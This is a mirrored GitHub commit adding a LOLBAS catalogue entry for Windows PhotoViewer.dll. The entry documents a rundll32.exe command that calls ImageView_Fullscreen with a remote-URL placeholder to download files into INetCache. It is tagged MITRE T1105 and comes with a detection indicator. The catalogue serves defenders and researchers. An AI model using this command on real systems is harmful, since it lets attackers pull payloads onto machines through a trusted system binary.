mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-01 16:05:27 +02:00
Add PhotoViewer.yml (#441)
Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
parent
803118bda7
commit
4ea5c504a4
24
yml/OSLibraries/PhotoViewer.yml
Normal file
24
yml/OSLibraries/PhotoViewer.yml
Normal file
@ -0,0 +1,24 @@
|
||||
---
|
||||
Name: PhotoViewer.dll
|
||||
Description: Windows Photo Viewer
|
||||
Author: Avihay Eldad
|
||||
Created: 2025-06-22
|
||||
Commands:
|
||||
- Command: rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll",ImageView_Fullscreen {REMOTEURL}
|
||||
Description: Once executed, rundll32.exe will download the file at the specified URL to the user's INetCache folder using the Windows Photo Viewer DLL.
|
||||
Usecase: Download file from remote location.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Windows Photo Viewer\PhotoViewer.dll
|
||||
- Path: C:\Program Files (x86)\Windows Photo Viewer\PhotoViewer.dll
|
||||
Detection:
|
||||
- IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a remote URL (containing '://') as an argument
|
||||
Acknowledgement:
|
||||
- Person: Avihay Eldad
|
||||
Handle: '@avihayeldad'
|
||||
- Person: Tommy Warren
|
Loading…
x
Reference in New Issue
Block a user